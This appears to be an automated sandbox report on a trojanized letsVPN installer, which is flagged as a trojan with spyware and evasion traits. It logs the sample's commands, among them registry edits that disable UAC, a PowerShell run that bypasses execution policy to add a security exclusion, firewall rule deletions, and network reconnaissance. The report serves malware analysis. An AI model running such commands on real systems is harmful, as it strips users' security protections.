              Source: C:\Windows\System32\svchost.exeProcess token adjusted: Security
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: String function: 6C55ED7E appears 138 times
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: String function: 6C55EDFC appears 69 times
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: String function: 6C55F750 appears 33 times
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: String function: 6C564B60 appears 37 times
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: String function: 6C5649A4 appears 65 times
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: String function: 00858C30 appears 40 times
              Source: System.Globalization.Extensions.dll.19.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: s.0.drStatic PE information: No import functions for PE file found
              Source: s.0.drStatic PE information: Data appended to the last section found
              Source: letsVPN.exe, 00000000.00000002.2213961398.0000000000681000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs letsVPN.exe
              Source: letsVPN.exe, 00000000.00000003.2211380442.0000000000681000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs letsVPN.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
              Source: System.IO.FileSystem.AccessControl.dll.19.dr, FileSystemAclExtensions.csSecurity API names: directoryInfo.GetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.19.dr, FileSystemAclExtensions.csSecurity API names: fileInfo.SetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.19.dr, FileSystemAclExtensions.csSecurity API names: fileStream.GetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.19.dr, FileSystemAclExtensions.csSecurity API names: fileInfo.GetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.19.dr, FileSystemAclExtensions.csSecurity API names: directoryInfo.SetAccessControl
              Source: System.IO.FileSystem.AccessControl.dll.19.dr, FileSystemAclExtensions.csSecurity API names: fileStream.SetAccessControl
              Source: System.IO.Pipes.AccessControl.dll.19.dr, PipesAclExtensions.csSecurity API names: System.IO.Pipes.PipeStream.SetAccessControl(System.IO.Pipes.PipeSecurity)
              Source: System.IO.Pipes.AccessControl.dll.19.dr, PipesAclExtensions.csSecurity API names: System.IO.Pipes.PipeStream.GetAccessControl()
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ".xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;" +
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c.xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec
              Source: classification engineClassification label: mal62.spre.troj.spyw.evad.winEXE@103/292@9/12
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180003848 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,_beginthreadex,Sleep,SleepEx,CloseHandle,0_2_0000000180003848
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,19_2_0040351C
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A1C7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,InitiateSystemShutdownExW,28_2_00007FF7132A1C7C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CE060 _wfindnext32i64,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,_getdiskfree,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,memset,GetDiskFreeSpaceA,GetLastError,_errno,17_2_6C5CE060
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000310C CoInitialize,CoImpersonateClient,CoInitializeSecurity,CLSIDFromProgID,CoCreateInstance,VariantInit,VariantInit,VariantInit,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantClear,CoUninitialize,0_2_000000018000310C
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A2C44 lstrcpyW,LoadLibraryW,FindResourceW,FindResourceExW,LoadResource,LockResource,lstrlenW,lstrcpyW,FreeLibrary,CreateEventW,CreateThread,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle,28_2_00007FF7132A2C44
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\Users\user\AppData\Roaming\b6Jzu.batJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
              Source: C:\Windows\System32\drvinst.exeMutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeMutant created: \Sessions\1\BaseNamedObjects\V 4 I
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMutant created: \Sessions\1\BaseNamedObjects\C__Program Files (x86)_letsvpn_app-3.12.0_Log_
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Instance: ESENT Performance Data Schema Version 295
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1288:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
              Source: C:\Users\user\Desktop\letsVPN.exeMutant created: \Sessions\1\BaseNamedObjects\V? 5
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nshFF05.tmp
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\b6Jzu.bat"
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCommand line argument: main.cc17_2_00375F90
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCommand line argument: Vll17_2_00375F90
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCommand line argument: main.cc17_2_00375F90
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCommand line argument: main.cc17_2_00375F90
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCommand line argument: main.cc17_2_00375F90
              Source: letsVPN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
              Source: C:\Users\user\Desktop\letsVPN.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2342669907.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3996035893.0000000068071000.00000002.00000001.01000000.0000002A.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: letsVPN.exeVirustotal: Detection: 32%
              Source: letsVPN.exeReversingLabs: Detection: 23%
              Source: tapinstall.exeString found in binary or memory: ng of the list. When the subcommand completes, the cursor is positioned on the newly-added filter. + Add after
              Source: tapinstall.exeString found in binary or memory: positioned on the newly-added filter. ! Deletes the next occurrence of the specified filter. When the subcommand
              Source: unknownProcess created: C:\Users\user\Desktop\letsVPN.exe "C:\Users\user\Desktop\letsVPN.exe"
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\QqXF5.xml
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\b6Jzu.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe "C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe"
              Source: unknownProcess created: C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe"
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\letsvpn\driver"
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "000000000000011C"
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe"
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
              Source: unknownProcess created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: unknownProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" "/silent"
              Source: unknownProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /allJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\QqXF5.xmlJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\b6Jzu.bat" Jump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /FJump to behavior
